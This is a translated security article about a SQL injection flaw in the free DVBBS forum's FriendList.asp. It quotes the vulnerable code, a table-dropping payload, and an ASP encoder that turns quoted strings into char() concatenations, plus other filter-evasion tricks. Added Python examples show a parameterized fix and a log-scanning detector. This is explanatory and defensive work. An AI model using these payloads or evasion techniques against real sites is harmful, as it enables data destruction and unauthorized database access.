Another type of vulnerability of free version DVBBS


Author: N.E.V.E.R    Source: www.safechina.net

Forum login name: n.e.v.e.r

Submit Email Address: n.e.v.e.r@tom.com

Submit QQ number: 1143431

Title: Another type of vulnerability for free version DVBBS

Copyright: This article is jointly owned by China Safety Net (http://www.safechina.net) and the author; please indicate the source when reprinting!

Content:

Many experts have already gone over the free version of the Dongwang (DVBBS) forum. I found that there may be a class of vulnerability that escaped their eyes, so I am writing it up. It was written in a hurry, so please correct any mistakes; my email is n.e.v.e.r@tom.com. The commercial registered version of DVBBS has the same problem, but it is not easy to exploit.

Take the function delfriend() in FriendList.asp of the Dongwang forum; in the middle there is a passage like this:

    delid = Replace(Request.Form("id"), "'", "")
    If delid = "" Or IsNull(delid) Then
        errmsg = errmsg & "<br>" & "<li>Please select the relevant parameters."
        founderr = True
        Exit Sub
    Else
        conn.execute("delete from friend where f_username='" & Trim(membername) & "' and f_id in (" & delid & ")")
        sucmsg = sucmsg & "<br>" & "<li>You have deleted the selected friend record."
        Call dvbbs_suc()
    End If

Strictly speaking, this filter is wrong: SQL injection is possible without a single quote at all.

I think the classic 1' or '1'='1 has blinded a lot of people. It goes like this:

    "select * from user where user='" & user & "' and ........."

I cannot use colours here to mark which quote pairs with which, but the point is this: SQL injection does not happen simply because a ' appears in user; it happens because a ' inside user makes quote 1 and quote 2 pair up differently from what the author intended. Filtering out ' fixes that particular problem perfectly, so Replace(user, "'", "") is neat and to the point.

However, the Dongwang developers missed the key point. Look at the half-line where the problem sits:

    ....... f_id in (" & delid & ")"

What is being paired here is the left and right parentheses! Filtering ' is beside the point. Let's look at a possible attack:

    delid = .....); drop table [user];

This submission passes the filter but still completes the SQL injection, successfully dropping the user table.
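As an added illustration (not DVBBS code), the Python below contrasts the article's quote-stripping filter with an allowlist for the numeric id list plus a parameterized IN (...) clause, using an in-memory SQLite stand-in for the friend table; the schema and helper names are assumptions.

```python
import re
import sqlite3

def make_db():
    """Constructed stand-in for the forum's friend table (assumption, not the DVBBS schema)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        create table friend (f_id integer, f_username text);
        insert into friend values (1, 'alice'), (2, 'alice'), (3, 'bob');
    """)
    return conn

def quote_strip_filter(delid):
    """The article's original filter: Replace(Request.Form("id"), "'", "")."""
    return delid.replace("'", "")

def parse_id_list(delid):
    """Allowlist check for a numeric IN (...) list: only digits and commas.
    Returns the ids as ints, or None when the value is anything else."""
    if not re.fullmatch(r"\s*\d+\s*(?:,\s*\d+\s*)*", delid or ""):
        return None
    return [int(part) for part in delid.split(",")]

def delete_friends(conn, membername, delid):
    """Hardened delete: validate first, then bind every value as a parameter,
    so the request value never becomes part of the SQL text.
    Returns the number of rows deleted, or 0 when the input is rejected."""
    ids = parse_id_list(delid)
    if ids is None:
        return 0
    placeholders = ",".join("?" * len(ids))
    sql = f"delete from friend where f_username = ? and f_id in ({placeholders})"
    cur = conn.execute(sql, [membername, *ids])
    conn.commit()
    return cur.rowcount

def friend_rows(conn):
    """Remaining rows, used to confirm the table survived a rejected request."""
    return conn.execute("select f_id, f_username from friend order by f_id").fetchall()

if __name__ == "__main__":
    conn = make_db()
    payload = "2); drop table [user];"  # the article's attack shape
    print("quote filter leaves payload as:", quote_strip_filter(payload))
    print("hardened delete on payload removed", delete_friends(conn, "alice", payload), "rows")
    print("hardened delete on '1, 2' removed", delete_friends(conn, "alice", "1, 2"), "rows")
    print("remaining rows:", friend_rows(conn))
```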

When I discussed this at Nanyang Rock, I only thought this injection method could modify some integer-type data. Later, while going through MSDN material, I suddenly found that the effect of ' can be achieved without using '. One way is to use the char function together with the + operator. I did these experiments in Query Analyzer:

    select * from sysusers where left(name, 2) = char(100) + char(98)

This returns all system users whose names start with db; in other words, it is equivalent to this query:

    select * from sysusers where left(name, 2) = 'db'

I posted an encode.asp in the "New Vulnerabilities and Intrusions" section that does this conversion, and I am posting it again here. It was written in a hurry, so if anyone has an improved version, please send it to me.

    ======================= cut here =======================
    <form method="POST">
    Fill in the SQL statement!
    <input type="text" name="in" size="100">
    <input type="submit" value="encode">
    </form>
    <%
    link_char = "+"               ' the string concatenation symbol is +
    strin = Request("in")
    strin = strin & "-"           ' append a sentinel so the scan below always stops
    strtemp = Split(strin, "'")   ' even elements lie outside quotes, odd elements inside
    i = 0
    'On Error Resume Next
    ' find the index of the first unquoted segment that contains the sentinel
    Do While i <= UBound(strtemp)
        If InStr(strtemp(i), "-") <> 0 Then
            Exit Do
        End If
        i = i + 2
    Loop
    'Response.Write i
    For j = 0 To i - 1 Step 2
        strout = strout & strtemp(j)
        ' rewrite every character of the quoted literal as char(n), joined with link_char
        For k = 1 To Len(strtemp(j + 1))
            strout = strout & "char(" & Asc(Mid(strtemp(j + 1), k, 1)) & ")" & link_char
        Next
        If Len(strtemp(j + 1)) > 0 Then
            strout = Left(strout, Len(strout) - Len(link_char))
        End If
    Next
    If InStr(strtemp(i), "-") <> 0 Then
        strout = strout & Left(strtemp(i), InStr(strtemp(i), "-") - 1)
    End If
    Response.Write strout
    %>
    ======================= cut here =======================

If + is also filtered here, it still works, but the method gets more complicated. Here is just one example, again with the query above; this one does not even need the +:

    select * from sysusers where left(name, 2) = stuff(replicate(char(100), 2), 2, 1, char(98))

The effect is the same. To be even stricter, it works without spaces as well:

    select/**/*/**/from/**/sysusers/**/where/**/left(name,2)=stuff(replicate(char(100),2),2,1,char(98))

However, this method makes the injected SQL much longer, and GET can only submit about 1024 bytes, which very likely is not enough; there are many complications. When I tested, I found that both methods were only valid for simple select/delete/update/insert/exec statements; I got errors when using OpenRowSet. I am still testing, and I hope some expert can save everyone a detour.
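To help spot the char(), stuff()/replicate() and /**/ tricks above in request logs, here is an added detection and normalization example in Python (not from the article); the indicator names and the log entries are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Signatures for the quote-free evasions the article walks through (constructed here).
INDICATORS = {
    "char_concat": re.compile(r"char\s*\(\s*\d+\s*\)(?:\s*\+\s*char\s*\(\s*\d+\s*\))+", re.I),
    "stuff_replicate": re.compile(r"\bstuff\s*\(\s*replicate\s*\(", re.I),
    "comment_as_space": re.compile(r"/\*\*/"),
    "stacked_statement": re.compile(r"\)\s*;\s*(?:drop|delete|update|insert|exec)\b", re.I),
}

def normalize(value):
    """Undo the obfuscation so an analyst sees what the database saw: URL-decode,
    turn /**/ back into a space and fold char(n)+char(n)... into the literal it spells."""
    text = unquote_plus(value).replace("/**/", " ")
    def fold(match):
        codes = re.findall(r"\d+", match.group(0))
        return "'" + "".join(chr(int(c)) for c in codes) + "'"
    return INDICATORS["char_concat"].sub(fold, text)

def classify(value):
    """Return the names of the indicators present in one URL-decoded parameter value."""
    decoded = unquote_plus(value)
    return [name for name, pattern in INDICATORS.items() if pattern.search(decoded)]

# Constructed request-log excerpt (method, path, raw query): not real traffic.
# A literal + in a query string arrives as %2B; a bare + decodes to a space.
SAMPLE_LOG = [
    ("POST", "/friendlist.asp", "id=1,2"),
    ("POST", "/friendlist.asp", "id=2);drop/**/table/**/[user];"),
    ("GET", "/list.asp", "sort=left(name,2)=char(100)%2Bchar(98)"),
    ("GET", "/list.asp", "sort=stuff(replicate(char(100),2),2,1,char(98))"),
]

def scan_log(entries):
    """Return (path, normalized value, indicators) for every entry with at least one hit."""
    findings = []
    for _method, path, query in entries:
        _name, _sep, value = query.partition("=")
        hits = classify(value)
        if hits:
            findings.append((path, normalize(value), hits))
    return findings

if __name__ == "__main__":
    for path, shown, hits in scan_log(SAMPLE_LOG):
        print(path, hits, shown)
```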

Having written this far, I think the problem can be summed up as a pairing issue. SQL injection is one case; cross-site script attacks are another. A cross-site script attack can also be seen as an HTML tag that is not closed correctly, but because HTML is very permissive, it usually does not require precisely closing a statement the way SQL injection requires closing a SQL query. The results of the two attacks are very similar: SQL injection lets the attacker use the SQL query language freely, and cross-site scripting lets the attacker use HTML freely. If HTML is also regarded as a language, then whenever a script dynamically generates another language, a new vulnerability type can appear. It began with SQL injection, which arises when VBScript generates SQL query statements; then came cross-site scripting, which arises when VBScript generates HTML. And in the future? I expect scripts will produce new kinds of problems that stay within this circle, for example VBScript generating XML, and so on. Coming back to the Dongwang forum: if they had not gotten tangled up in the question of filtering, but had taken pairing as the assessment criterion, these problems would not exist.

Please credit the original address when reprinting: https://www.9cbs.com/read-100696.html